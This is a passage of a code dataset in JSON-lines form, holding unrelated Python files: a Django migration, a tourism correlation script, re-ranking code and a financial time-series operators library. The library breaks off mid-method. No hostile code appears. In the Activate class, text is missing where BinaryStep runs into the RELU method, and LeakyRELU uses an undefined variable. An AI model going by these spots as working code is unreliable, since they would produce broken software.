(trip_passanger[i] + trip_passanger[j])\n\n # Setting the matrix using numpy array\n\n helpers.SetMatrix(Visum, new_matrix_no, new_matrix)\n win = window()","sub_path":"VISUM/Matrix_creation.py","file_name":"Matrix_creation.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"26493077","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport blog.models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0006_auto_20150926_0833'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Media',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, serialize=False, primary_key=True)),\n ('name', models.CharField(max_length=250, unique=True, verbose_name='Название Видео', db_index=True, default='', blank=True)),\n ('title', models.CharField(verbose_name='Заголовок в браузере', max_length=250, blank=True)),\n ('image', models.ImageField(verbose_name='Видео', upload_to=blog.models.make_upload_path, default='', blank=True)),\n ('metakey', models.CharField(verbose_name='Ключевые слова', max_length=250, blank=True)),\n ('metadesc', models.CharField(verbose_name='Мета описание', max_length=250, blank=True)),\n ('slug', models.CharField(verbose_name='Урл', max_length=250, blank=True)),\n ('published', models.BooleanField(verbose_name='Опубликован', default=0)),\n ('ordering', models.IntegerField(verbose_name='Порядок сортировки', null=True, blank=True, default=0)),\n ('count_posts', models.IntegerField(verbose_name='Количество постов', null=True, blank=True, default=0)),\n ('parent', models.ForeignKey(null=True, blank=True, verbose_name='Родительская категория', to='blog.Media')),\n ],\n options={\n 'verbose_name': 'Видеотека',\n 'verbose_name_plural': 'Видеотеки',\n 'ordering': ['ordering'],\n },\n ),\n migrations.CreateModel(\n name='Video',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, serialize=False, primary_key=True)),\n ('name', models.CharField(verbose_name='Название', max_length=250, default='', blank=True)),\n ('video', models.FileField(verbose_name='Изображение', upload_to=blog.models.make_upload_path, default='', blank=True)),\n ('media', models.ForeignKey(null=True, blank=True, verbose_name='Галерея', related_name='c6', to='blog.Media')),\n ('post', models.ForeignKey(null=True, blank=True, verbose_name='Пост', related_name='c5', to='blog.Post')),\n ],\n options={\n 'verbose_name': 'Видео',\n 'verbose_name_plural': 'Видео',\n },\n ),\n ]\n","sub_path":"blog/migrations/0007_media_video.py","file_name":"0007_media_video.py","file_ext":"py","file_size_in_byte":2841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"326221821","text":"# 스칼라 값으로 초기화 할때는 반드시 인덱스가 필요\nimport json\n\nimport math\nimport pandas as pd\nimport scipy.stats as ss\nimport matplotlib.pyplot as plt\n\ns1 = pd.Series(7, index=['a', 'b', 'c', 'd'])\nprint(s1)\n\n\n\n\n\n\nresultfile = '../__results__/crawling/서울특별시_tourspot_2017_2017.json'\nresultfiles = ['../__results__/crawling/일본(130)_foreignvisitor_2017_2017.json',\n '../__results__/crawling/미국(275)_foreignvisitor_2017_2017.json',\n '../__results__/crawling/중국(112)_foreignvisitor_2017_2017.json']\n\n# 아래는 상관계수의 구현 코드...(사용해 볼것!) #########################################################################\ndef correlation_coefficient(x, y):\n n = len(x)\n vals = range(n)\n\n x_sum = 0.0\n y_sum = 0.0\n x_sum_pow = 0.0\n y_sum_pow = 0.0\n mul_xy_sum = 0.0\n\n for i in vals:\n mul_xy_sum = mul_xy_sum + float(x[i]) * float(y[i])\n x_sum = x_sum + float(x[i])\n y_sum = y_sum + float(y[i])\n x_sum_pow = x_sum_pow + pow(float(x[i]), 2)\n y_sum_pow = y_sum_pow + pow(float(y[i]), 2)\n\n try:\n r = ((n * mul_xy_sum) - (x_sum * y_sum)) / \\\n math.sqrt(((n * x_sum_pow) - pow(x_sum, 2)) * ((n * y_sum_pow) - pow(y_sum, 2)))\n except ZeroDivisionError as e:\n r = 0.0\n\n return r\n########################################################################################################################\n\n# 투어리스트 스팟 테이블 작성 ##########################################################################################\nwith open(resultfile, 'r', encoding='utf-8') as infile:\n json_data = json.loads(infile.read())\n# print(json_data)\ntourspotvisitor_table = pd.DataFrame(json_data, columns=['date', 'tourist_spot','count_foreigner'])\nprint(tourspotvisitor_table)\n########################################################################################################################\n\n# 루프를 돌기위한 관광지 리스트 추출 ###################################################################################\ntourist_spot_list = tourspotvisitor_table['tourist_spot'].unique()\n########################################################################################################################\n\n# 외국인 방문객의 월별 카운트 테이블 작성 ##############################################################################\n# 외국인 방문객의 spot 별 조인된 테이블을 담기위한 리스트 : tables $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n\nforeignvisitor_table_list = []\nfor filename in resultfiles:\n with open(filename, 'r', encoding='utf-8') as infile:\n json_data = json.loads(infile.read())\n foreignvisitor_table = pd.DataFrame(json_data, columns=['date', 'country_name', 'visit_count']).sort_values('date').set_index('date')\n # foreignvisitor_table.rename(columns={'visit_count': '{0}'.format(foreignvisitor_table['country_name'].unique()[0])}, inplace=True)\n # del foreignvisitor_table[\"country_name\"]\n # print(foreignvisitor_table)\n foreignvisitor_table_list.append(foreignvisitor_table)\n # visit_count = foreignvisitor_table['visit_count'].get_values().tolist()\n########################################################################################################################\n\n# 각 관광지별 월별 방문객 테이블 루프 안에서 외국인 방문객 테이블을 각각 조인하여 시각화를 위한 전처리 수행 ############\n# 시각화를 위한 데이터의 전처리 ########################################################################################\nresultSetList = [] # 이곳에 시각화에 사용될 데이터셋을 담을 것!\n # 필요한 데이터는 장소명, 나라명, coefficient\n\nfor index, spot in enumerate(tourist_spot_list):\n temp_table = tourspotvisitor_table[tourspotvisitor_table['tourist_spot'] == spot].sort_values('date').set_index('date')\n\n resultSet = {'tour_spot' : spot}\n for foreignvisitor_table in foreignvisitor_table_list:\n merge_table = pd.merge(temp_table, foreignvisitor_table, left_index=True, right_index=True)\n print(merge_table)\n\n# 상관계수에 필요한 데이터 추출 - 리스트로...###########################################################################\n count_foreigner = list(merge_table['count_foreigner'])\n visit_count = list(merge_table['visit_count'])\n########################################################################################################################\n# 데이터 결과를 그래프로 나타내기 위해 필요한 나라이름, correlation coefficient 추출 ###################################\n r = correlation_coefficient(count_foreigner, visit_count)\n country_name = merge_table['country_name'].unique()[0]\n########################################################################################################################\n print(spot, country_name, r)\n\n# 결과를 딕셔너리에 업데이트 후 최종 리스트에 추가\n resultSet.update({'r_{0}'.format(country_name) : r})\n resultSetList.append(resultSet)\n\nprint(resultSetList)\n# return resultSetList\n\n\ndef graph_ex_last(result_analysis):\n graph_table = pd.DataFrame(result_analysis, columns=['tour_spot', 'r_중국', 'r_일본', 'r_미국'])\n graph_table = graph_table.set_index('tour_spot')\n\n graph_table.plot(kind='bar')\n plt.show()\n\ngraph_ex_last(resultSetList)","sub_path":"__test__/test_my.py","file_name":"test_my.py","file_ext":"py","file_size_in_byte":5491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"104788296","text":"import numpy as np\r\nimport copy\r\ndef graph_reasoning(dist_p_g, dist_g_g, lambda_rgb=0.01, topk=9):\r\n #similarity graph reasoning\r\n dist_p_g = copy.deepcopy(dist_p_g)\r\n dist_g_g = copy.deepcopy(lambda_rgb* dist_g_g)\r\n gi_neibor_index = np.argsort(dist_g_g)[:,:20]\r\n for j in range(dist_p_g.shape[1]):\r\n\r\n dist_p_k = dist_p_g[:,gi_neibor_index[j]] + dist_g_g[j, gi_neibor_index[j]]\r\n dist_p_gj = np.sort(dist_p_k, axis=1)[:,:topk].mean(axis=1)\r\n dist_p_g[:,j] = dist_p_gj\r\n\r\n\r\n return dist_p_g\r\n\r\ndef re_ranking(q_g_dist, g_g_dist, k0=12, k1=20, k2=6, lambda_value=0.3):\r\n\r\n original_dist = np.concatenate([q_g_dist.T, g_g_dist], axis=1)\r\n original_dist = np.power(original_dist, 2).astype(np.float32)\r\n original_dist = np.transpose(1. * original_dist/np.max(original_dist,axis = 0))\r\n\r\n query_num = q_g_dist.shape[0]\r\n gallery_num = q_g_dist.shape[1]\r\n all_num = q_g_dist.shape[0] + q_g_dist.shape[1]\r\n \r\n q_g_dist = original_dist[:query_num,]\r\n g_g_dist = original_dist[query_num:,]\r\n\r\n V_q = np.zeros_like(q_g_dist).astype(np.float32)\r\n initial_rank_q = np.argsort(q_g_dist).astype(np.int32)\r\n\r\n V_g = np.zeros_like(g_g_dist).astype(np.float32)\r\n initial_rank_g = np.argsort(g_g_dist).astype(np.int32) \r\n\r\n\r\n ##q g similarity matrix\r\n for i in range(query_num):\r\n # k-reciprocal neighbors\r\n forward_k_neigh_index = initial_rank_q[i,:k0+1]\r\n k_reciprocal_expansion_index = forward_k_neigh_index\r\n\r\n k_reciprocal_expansion_index = np.unique(k_reciprocal_expansion_index)\r\n weight = np.exp(-q_g_dist[i,k_reciprocal_expansion_index])\r\n V_q[i,k_reciprocal_expansion_index] = 1.*weight/np.sum(weight) \r\n\r\n\r\n # g g similarity matrix\r\n for i in range(gallery_num):\r\n # k-reciprocal neighbors\r\n forward_k_neigh_index = initial_rank_g[i,:k1+1]\r\n backward_k_neigh_index = initial_rank_g[forward_k_neigh_index,:k1+1]\r\n fi = np.where(backward_k_neigh_index==i)[0]\r\n k_reciprocal_index = forward_k_neigh_index[fi]\r\n # import pdb;pdb.set_trace()\r\n k_reciprocal_expansion_index = k_reciprocal_index\r\n for j in range(len(k_reciprocal_index)):\r\n candidate = k_reciprocal_index[j]\r\n candidate_forward_k_neigh_index = initial_rank_g[candidate,:int(np.around(k1/2.))+1]\r\n candidate_backward_k_neigh_index = initial_rank_g[candidate_forward_k_neigh_index,:int(np.around(k1/2.))+1]\r\n fi_candidate = np.where(candidate_backward_k_neigh_index == candidate)[0]\r\n candidate_k_reciprocal_index = candidate_forward_k_neigh_index[fi_candidate]\r\n if len(np.intersect1d(candidate_k_reciprocal_index,k_reciprocal_index))> 2./3*len(candidate_k_reciprocal_index):\r\n k_reciprocal_expansion_index = np.append(k_reciprocal_expansion_index,candidate_k_reciprocal_index)\r\n\r\n k_reciprocal_expansion_index = np.unique(k_reciprocal_expansion_index)\r\n weight = np.exp(-g_g_dist[i,k_reciprocal_expansion_index])\r\n V_g[i,k_reciprocal_expansion_index] = 1.*weight/np.sum(weight)\r\n\r\n \r\n V = np.concatenate([V_q,V_g], axis=0)\r\n V = np.concatenate([np.zeros((all_num, query_num)),V], axis=1)\r\n initial_rank = np.concatenate([initial_rank_q, initial_rank_g], axis=0)\r\n \r\n original_dist = np.concatenate([np.zeros((query_num, query_num)), q_g_dist], axis=1)\r\n\r\n del initial_rank\r\n invIndex = []\r\n for i in range(all_num):\r\n invIndex.append(np.where(V[:,i] != 0)[0]) # row indx\r\n\r\n jaccard_dist = np.zeros_like(original_dist,dtype = np.float32)\r\n\r\n\r\n for i in range(query_num):\r\n temp_min = np.zeros(shape=[1,all_num],dtype=np.float32)\r\n indNonZero = np.where(V[i,:] != 0)[0] #col indx\r\n indImages = []\r\n indImages = [invIndex[ind] for ind in indNonZero]\r\n for j in range(len(indNonZero)):\r\n temp_min[0,indImages[j]] = temp_min[0,indImages[j]]+ np.minimum(V[i,indNonZero[j]],V[indImages[j],indNonZero[j]])\r\n jaccard_dist[i] = 1-temp_min/(2.-temp_min)\r\n\r\n final_dist = jaccard_dist*(1-lambda_value) + original_dist*lambda_value\r\n del original_dist\r\n del V\r\n del jaccard_dist\r\n final_dist = final_dist[:query_num,query_num:]\r\n return final_dist","sub_path":"utils/relevancemetric.py","file_name":"relevancemetric.py","file_ext":"py","file_size_in_byte":4298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"491553905","text":"import os\r\nimport re\r\nimport time\r\nimport numpy as np\r\nimport numpy.ma as npma\r\nimport math as m\r\nimport pandas as pd\r\nimport seaborn as sns\r\nimport datetime as dt\r\nimport random as rdn\r\nimport matplotlib.pyplot as plt\r\nimport scipy\r\nplt.style.use('ggplot')\r\nfrom pandas.plotting import register_matplotlib_converters\r\nregister_matplotlib_converters()\r\n\r\nclass DrawPlotByTS():\r\n def __init__(self):\r\n print('Initializing DrawPlotByTS...')\r\n print('Sucessfully Initializing DrawPlotByTS')\r\n \r\n def PlotLogPicture(self,dfname,period,*input_return): #list,single_df\r\n fig = plt.figure(figsize=(15,3))\r\n plt.title(\"price\")\r\n plt.yscale(\"log\")\r\n col_labels=['return','std','sharpe','max_drawdown']\r\n row_labels=dfname\r\n table_vals=[]\r\n input_len=len(input_return)\r\n time=input_return[0].index\r\n for i,single in enumerate(input_return):\r\n cumulate=single.cumprod()\r\n drawdown=self.CalculateDrawdown(cumulate)\r\n [a,b,c,d]=self.CalculateBasicInformation(cumulate,single,period)[0:4]\r\n table_vals.append([a,b,c,d])\r\n plt.plot(time,cumulate,label=dfname[i])\r\n plt.legend()\r\n plt.table(cellText=table_vals,rowLabels=row_labels,colLabels=col_labels,loc='lower right',colWidths = [0.15]*4)\r\n plt.show()\r\n \r\n def PlotDrawdown(self,dfname,*cumulate): #list,cumulate_df\r\n input_len=len(cumulate)\r\n time=cumulate[0].index\r\n drawdown_combine=[]\r\n for i,cumulate_each in enumerate(cumulate):\r\n plt.figure(figsize=(15,3))\r\n plt.title(dfname[i])\r\n drawdown_combine.append(self.CalculateDrawdown(cumulate_each))\r\n plt.fill_between(time,0,drawdown_combine[-1],facecolor='red')\r\n plt.ylim(top = 0, bottom = -0.6)\r\n plt.show()\r\n if len(cumulate)==2:\r\n plt.figure(figsize=(15,3))\r\n plt.title(\"combine_drawdown\")\r\n drawdown_temp=[]\r\n for i in range(len(drawdown_combine[0])):\r\n if drawdown_combine[0][i]>=drawdown_combine[1][i]:\r\n drawdown_temp.append(drawdown_combine[0][i])\r\n else:\r\n drawdown_temp.append(drawdown_combine[1][i])\r\n plt.fill_between(time,0,drawdown_combine[0],facecolor='blue',label=dfname[0])\r\n plt.fill_between(time,drawdown_temp,drawdown_combine[1],facecolor='red',label=dfname[1])\r\n plt.ylim(top = 0, bottom = -0.6)\r\n plt.legend(loc='lower right')\r\n plt.show()\r\n def CalculateDrawdown(self,price):\r\n drawdown=0\r\n x=1\r\n for i in range(1,len(price)):\r\n if price.iloc[i]>x:\r\n x=price.iloc[i]\r\n drawdown=np.append(drawdown,-(1-price.iloc[i]/x))\r\n return drawdown\r\n \r\n def TwoDigitsPercent(self,input_float):\r\n return ('%s'% (np.round(100*input_float,2))+'%')\r\n \r\n def TwoDigits(self,input_float):\r\n return ('%s'% (np.round(input_float,2)))\r\n \r\n def CalculateBasicInformation(self,price,ret,data_period):\r\n data_period=float(data_period)\r\n print(price.iloc[-1],data_period,price.shape[0])\r\n exp_return=(price.iloc[-1]**(data_period/price.shape[0])-1.0) #imply that price[0]=1\r\n std=ret.std()*m.sqrt(data_period)\r\n sharpe=exp_return/std\r\n max_drawdown=pd.DataFrame(self.CalculateDrawdown(price)).min().iloc[0]\r\n return_dd_ratio = -exp_return/max_drawdown\r\n outputs = [exp_return,std,sharpe,max_drawdown,return_dd_ratio]\r\n outputs_str = []\r\n for o in outputs:\r\n if o<1:\r\n outputs_str.append(self.TwoDigitsPercent(o))\r\n else:\r\n outputs_str.append(self.TwoDigits(o))\r\n return outputs_str\r\n\r\n def CalculateBasicInformationFast(self,price,ret,data_period):\r\n data_period=float(data_period)\r\n #print(price.iloc[-1],data_period,price.shape[0])\r\n exp_return=(price.iloc[-1]**(data_period/price.shape[0])-1.0) #imply that price[0]=1\r\n std=ret.std()*m.sqrt(data_period)\r\n sharpe=exp_return/std\r\n max_drawdown=pd.DataFrame(self.CalculateDrawdown(price)).min().iloc[0]\r\n return_dd_ratio = -exp_return/max_drawdown\r\n outputs = [exp_return,std,sharpe,max_drawdown,return_dd_ratio]\r\n return outputs\r\n\r\nclass Activate():\r\n def BinaryStep(self,df,interval,unact_value=0,include_bound=True):\r\n threshold_low,threshold_up = interval[0],interval[1]\r\n if include_bound == True:\r\n res = np.where((df>=threshold_low)&(df<=threshold_up),1,unact_value)\r\n else:\r\n res = np.where((df>threshold_low)&(dfthreshold,df,0)\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n\r\n def LeakyRELU(self,df,threshold,slope):\r\n res = np.where(df>threshold,df,coef*df)\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n\r\n def Softmax(self,df):\r\n df_exp = np.exp(df)\r\n exp_sum = np.sum(df_exp,axis=1)\r\n df_exp_sum = np.tile(exp_sum,reps=(len(df.columns),1)).T\r\n res = df_exp/df_exp_sum\r\n return res\r\n\r\n def Swish(self,df,threshold):\r\n res = df/(1 + np.exp(-df))\r\n return res\r\n\r\nclass Operators(Activate):\r\n def __init__(self):\r\n print('Initializing Operator...')\r\n print('Successfuly Initializing Operator')\r\n\r\n def GetDFShell(self,df,value=0):\r\n res = np.full_like(df,value)\r\n res = pd.DataFrame(res,index = df.index,columns=df.columns)\r\n return res\r\n \r\n def TransDFtoNP(self,matrix):\r\n res = matrix.copy()\r\n if type(matrix) == pd.DataFrame:\r\n res = matrix.values\r\n return res\r\n \r\n def TransNPtoOriDF(self,np_array,ori_matrix):\r\n res = np_array.copy()\r\n if type(ori_matrix) == pd.DataFrame:\r\n res = pd.DataFrame(res,index=ori_matrix.index,columns=ori_matrix.columns)\r\n return res\r\n \r\n def FillRowN(self,df,fill_in_content,row_number):\r\n res,fill_array = self.TransDFtoNP(df),self.TransDFtoNP(fill_in_content)\r\n res[row_number,:] = fill_array[row_number,:]\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n \r\n def FwdChangeRate(self,df,period=1):\r\n df_next = df.shift(-period)\r\n return df_next/df - 1\r\n \r\n def BwdChangeRate(self,df,period=1):\r\n df_last = df.shift(period)\r\n return df/df_last - 1\r\n \r\n def FwdChangeNumber(self,df,period=1):\r\n df_next = df.shift(-period)\r\n return df_next - df\r\n \r\n def BwdChangeNumber(self,df,period=1):\r\n df_last = df.shift(period)\r\n return df - df_last\r\n\r\n def GetSegList(self,segment_np):\r\n s_list = []\r\n for s in (segment_np[[0,-1],:].flatten()):\r\n if s==s and s not in s_list:\r\n s_list.append(s)\r\n return s_list\r\n\r\n def SegFirmsCount(self,segment_df):\r\n segment_np = segment_df.values\r\n seglist = self.GetSegList(segment_np)\r\n res = np.full_like(segment_df,0)\r\n print(len(seglist))\r\n for seg in seglist:\r\n seg_boolin = np.where(segment_np==seg,1,0)\r\n seg_boolin = self.TransNPtoOriDF(seg_boolin,segment_df)\r\n seg_num = self.Extend1DTSto2D(np.sum(seg_boolin,axis=1),seg_boolin)\r\n seg_num_masked = np.where(segment_np==seg,seg_num,0)\r\n res += seg_num_masked\r\n res = self.TransNPtoOriDF(res,segment_df)\r\n res = res.where(segment_df==segment_df)\r\n return res\r\n\r\n def SegSum(self,df,segment_df):\r\n segment_np,np_array = segment_df.values,df.values\r\n seglist = self.GetSegList(segment_np)\r\n res = np.full_like(df,0)\r\n for seg in seglist:\r\n seg_boolin = np.where(segment_np==seg,np_array,0)\r\n seg_boolin = self.TransNPtoOriDF(seg_boolin,df)\r\n seg_sum = self.Extend1DTSto2D(np.sum(seg_boolin,axis=1),seg_boolin)\r\n seg_sum_masked = np.where(segment_np==seg,seg_sum,0)\r\n res += seg_sum_masked\r\n res = self.TransNPtoOriDF(res,df)\r\n res = res.where(segment_df==segment_df)\r\n return res\r\n\r\n def SegMean(self,df,segment_df):\r\n segment_np,np_array = segment_df.values,df.values\r\n seglist = self.GetSegList(segment_np)\r\n res = np.full_like(df,0)\r\n for seg in seglist:\r\n seg_boolin = np.where(segment_np==seg,np_array,np.nan)\r\n seg_boolin = self.TransNPtoOriDF(seg_boolin,df)\r\n seg_mean = pd.DataFrame(np.nanmean(seg_boolin,axis=1),index=seg_boolin.index)\r\n seg_mean = self.Extend1DTSto2D(seg_mean,seg_boolin) \r\n seg_mean_masked = np.where(segment_np==seg,seg_mean,0)\r\n res += seg_mean_masked\r\n res = self.TransNPtoOriDF(res,df)\r\n res = res.where(segment_df==segment_df)\r\n return res\r\n\r\n def SegRank(self,df,segment_df,max_has_maxrank=False):\r\n segment_np,np_array = segment_df.values,df.values\r\n seglist = self.GetSegList(segment_np)\r\n print(len(seglist))\r\n res = np.full_like(df,0)\r\n for seg in seglist:\r\n seg_boolin = np.where(segment_np==seg,np_array,np.nan)\r\n seg_boolin = self.TransNPtoOriDF(seg_boolin,df)\r\n seg_rank = self.Rank(seg_boolin,max_has_maxrank=max_has_maxrank)\r\n seg_rank_masked = np.where(segment_np==seg,seg_rank,0)\r\n res += seg_rank_masked\r\n res = self.TransNPtoOriDF(res,df)\r\n res = res.where(segment_df==segment_df)\r\n return res\r\n\r\n def SegSubByRankNData(self,df,segment_df,ranked_segment_df,n=1):\r\n np_array,segment_np,segment_rank_np = df.values,segment_df.values,ranked_segment_df.values\r\n seglist = self.GetSegList(segment_np)\r\n res = np.full_like(df,0)\r\n for i in range(df.shape[0]):\r\n for j1 in range(df.shape[1]):\r\n if segment_rank_np[i,j1] == 1:\r\n for j2 in range(df.shape[1]):\r\n if segment_np[i,j1] == segment_np[i,j2]:\r\n res[i,j2] = np_array[i,j1]\r\n res = self.TransNPtoOriDF(res,df)\r\n res = res.where(segment_df==segment_df)\r\n return res\r\n\r\n\r\n def SegZscore(self,df,segment_df):\r\n segment_np,np_array = segment_df.values,df.values\r\n seglist = self.GetSegList(segment_np)\r\n res = np.full_like(df,0)\r\n for seg in seglist:\r\n seg_boolin = np.where(segment_np==seg,np_array,np.nan)\r\n seg_boolin = self.TransNPtoOriDF(seg_boolin,df)\r\n seg_rank = self.RowZscore(seg_boolin)\r\n seg_rank_masked = np.where(segment_np==seg,seg_rank,0)\r\n res += seg_rank_masked\r\n res = self.TransNPtoOriDF(res,df)\r\n res = res.where(segment_df==segment_df)\r\n return res\r\n\r\n def MovingAverage(self,df,period):\r\n np_array = self.TransDFtoNP(df)\r\n res = np_array.copy()\r\n for i in range(1,period):\r\n x = np.roll(np_array,i,axis=0)\r\n res += x\r\n res = res/period\r\n try:\r\n res[:period-1,:] = np.nan\r\n except:\r\n res[:period-1] = np.nan\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n\r\n def ExpMovingAverage(self,df,alpha): #EMAt = alpha*(today)+(1-alpha)*(EMAt-1)\r\n np_array = self.TransDFtoNP(df)\r\n res = np_array.copy()\r\n for i in range(1,len(np_array)):\r\n temp = res[i-1,:].copy()\r\n temp2 = np.where(temp==temp,temp,0)\r\n res[i,:] = (1-alpha)*temp2 + alpha*np_array[i,:]\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n\r\n def RowMean(self,df):\r\n np_array = self.TransDFtoNP(df)\r\n row_mean = np.nanmean(np_array,axis=1)\r\n row_mean = pd.DataFrame(row_mean,index=df.index)\r\n res = self.Extend1DTSto2D(row_mean,df)\r\n return res\r\n\r\n def RowStd(self,df):\r\n np_array = self.TransDFtoNP(df)\r\n row_std = np.nanstd(np_array,axis=1)\r\n row_std = pd.DataFrame(row_std,index=df.index)\r\n res = self.Extend1DTSto2D(row_std,df)\r\n return res\r\n\r\n def RowZscore(self,df):\r\n row_mean = self.RowMean(df)\r\n row_std = self.RowStd(df)\r\n res = (df - row_mean)/row_std\r\n return res\r\n\r\n def ColumnStack(self,df):\r\n np_array = self.TransDFtoNP(df)\r\n res = np.full_like(np_array,np.nan,dtype=np.float)\r\n for i in range(len(np_array)):\r\n temp = np.nansum(np_array[:i+1,:],axis=0)\r\n res[i,:] = temp\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n\r\n def ColumnRSV(self,df,period):\r\n np_array = self.TransDFtoNP(df)\r\n res = np.full_like(np_array,np.nan,dtype=np.float)\r\n for i in range(period-1,len(np_array)):\r\n temp = (np_array[i,:]-np.min(np_array[i-period+1:i+1,:],axis=0))/(np.max(np_array[i-period+1:i+1,:],axis=0)-np.min(np_array[i-period+1:i+1,:],axis=0))\r\n res[i,:] = temp\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n\r\n def ColumnSum(self,df,period):\r\n np_array = self.TransDFtoNP(df)\r\n res = np.full_like(np_array,np.nan,dtype=np.float)\r\n for i in range(period-1,len(np_array)):\r\n temp = np.sum(np_array[i-period+1:i+1,:],axis=0)\r\n res[i,:] = temp\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n\r\n def ColumnMean(self,df,period):\r\n np_array = self.TransDFtoNP(df)\r\n res = np.full_like(np_array,np.nan,dtype=np.float)\r\n for i in range(period-1,len(np_array)):\r\n temp = np.mean(np_array[i-period+1:i+1,:],axis=0)\r\n res[i,:] = temp\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n\r\n def ColumnStd(self,df,period):\r\n np_array = self.TransDFtoNP(df)\r\n res = np.full_like(np_array,np.nan,dtype=np.float)\r\n for i in range(period-1,len(np_array)):\r\n temp = np.std(np_array[i-period+1:i+1,:],axis=0)\r\n res[i,:] = temp\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n\r\n def ColumnZscore(self,df,period):\r\n res = (df-self.ColumnMean(df,period))/self.ColumnStd(df,period)\r\n return res\r\n\r\n def ColumnCorr(self,df,col_list):\r\n corr_matrix=df[col_list].corr()\r\n return corr_matrix\r\n\r\n def ColumnCorrDesc(self,df):\r\n res = self.ColumnCorrAsc(df)\r\n res.reverse()\r\n return res\r\n\r\n def ColumnCorrAsc(self,df):\r\n corr_matrix = self.ColumnCorr(df,list(df.columns)).values\r\n firms = df.columns\r\n res = []\r\n for i in range(1,len(df.columns)):\r\n for j in range(0,i):\r\n if corr_matrix[i,j] == corr_matrix[i,j]:\r\n d,f = firms[i],firms[j]\r\n res.append([(d,f),np.round(corr_matrix[i,j],4)])\r\n res.sort(key=lambda x: x[1])\r\n return res\r\n\r\n def ColumnMax(self,df,period):\r\n np_array = self.TransDFtoNP(df)\r\n res = np.full_like(np_array,np.nan,dtype=np.float)\r\n for i in range(period-1,len(np_array)):\r\n temp = np.max(np_array[i-period+1:i+1,:],axis=0)\r\n res[i,:] = temp\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n\r\n def ColumnMin(self,df,period):\r\n np_array = self.TransDFtoNP(df)\r\n res = np.full_like(np_array,np.nan,dtype=np.float)\r\n for i in range(period-1,len(np_array)):\r\n temp = np.min(np_array[i-period+1:i+1,:],axis=0)\r\n res[i,:] = temp\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n\r\n def NDayCorrOfTwoArray(self,df1,df2,period): #shape of df1,df2 must be the same\r\n np1,np2 = self.TransDFtoNP(df1),self.TransDFtoNP(df2)\r\n res = np.full_like(np1,np.nan,dtype=np.float)\r\n for i in range(period-1,len(np1)):\r\n for j in range(len(np1[i])):\r\n temp = np.corrcoef(np1[i-period+1:i+1,j],np2[i-period+1:i+1,j])[1,0]\r\n res[i,j] = temp\r\n res = self.TransNPtoOriDF(res,df1)\r\n return res\r\n\r\n def Compound(self,df,plus_one=False):\r\n cal_df = df.copy()\r\n if plus_one == True:\r\n cal_df += 1\r\n cal_df = cal_df.fillna(1)\r\n res = cal_df.copy()\r\n for i in range(1,len(df)):\r\n temp = cal_df.shift(i).fillna(1)\r\n res *= temp\r\n return res\r\n \r\n def DisCompound(self,df,minus_one=False):\r\n cal_df = df.copy()\r\n cal_last = cal_df.shift(1)\r\n res = cal_df/cal_last\r\n res = res.fillna(1)\r\n if minus_one == True:\r\n res -= 1\r\n return res\r\n \r\n def NDayRetBwd(self,df,period,plus_one=1):\r\n np_array = self.TransDFtoNP(df)+plus_one\r\n res = np.full_like(np_array,np.nan,dtype=np.float)\r\n for i in range(period-1,len(np_array)):\r\n temp = np.prod(np_array[i-period+1:i+1,:],axis=0)-plus_one\r\n res[i,:] = temp\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n\r\n def NDayRetFwd(self,df,period,plus_one=1):\r\n np_array = self.TransDFtoNP(df)+plus_one\r\n res = np.full_like(np_array,np.nan,dtype=np.float)\r\n for i in range(period-1,len(np_array)):\r\n temp = np.prod(np_array[i:i+period,:],axis=0)-plus_one\r\n res[i,:] = temp\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n\r\n def Sign(self,df):\r\n np_array = self.TransDFtoNP(df)\r\n res = np.sign(np_array)\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n\r\n def SignStreak(self,df,zero_continue=True):\r\n array = self.TransDFtoNP(df)\r\n res = np.full_like(array,np.nan)\r\n res[0,:] = np.sign(array[0,:])\r\n for j in range(len(array[0])):\r\n for i in range(1,len(array)):\r\n last_sign = np.sign(res[i-1,j])\r\n if array[i,j]*last_sign > 0:\r\n res[i,j] = last_sign*(1+abs(res[i-1,j]))\r\n elif array[i,j]*last_sign < 0:\r\n res[i,j] = -last_sign\r\n elif array[i,j]*last_sign == 0:\r\n if zero_continue == True:\r\n res[i,j] = res[i-1,j]\r\n else:\r\n res[i,j] = np.sign(array[i,j])\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n \r\n def Rank(self,df,max_has_maxrank=False):\r\n res = df.rank(axis=1,method='average',ascending=max_has_maxrank)\r\n return res\r\n\r\n def PR(self,df,max_has_maxrank=True):\r\n rank = self.Rank(df,max_has_maxrank=max_has_maxrank)\r\n row_max = rank.max(axis=1)\r\n div = self.Extend1DTSto2D(row_max,rank)\r\n res = 100*rank/div\r\n return res\r\n\r\n def LinearCombination(self,weight_list,df_list):\r\n linear_combination = 0\r\n for i in range(0,len(df_list)):\r\n linear_combination += weight_list[i]*df_list[i]\r\n return linear_combination\r\n \r\n def Perceptron(self,weight_list,df_list,activate_func,params_for_actfunc):\r\n lc = 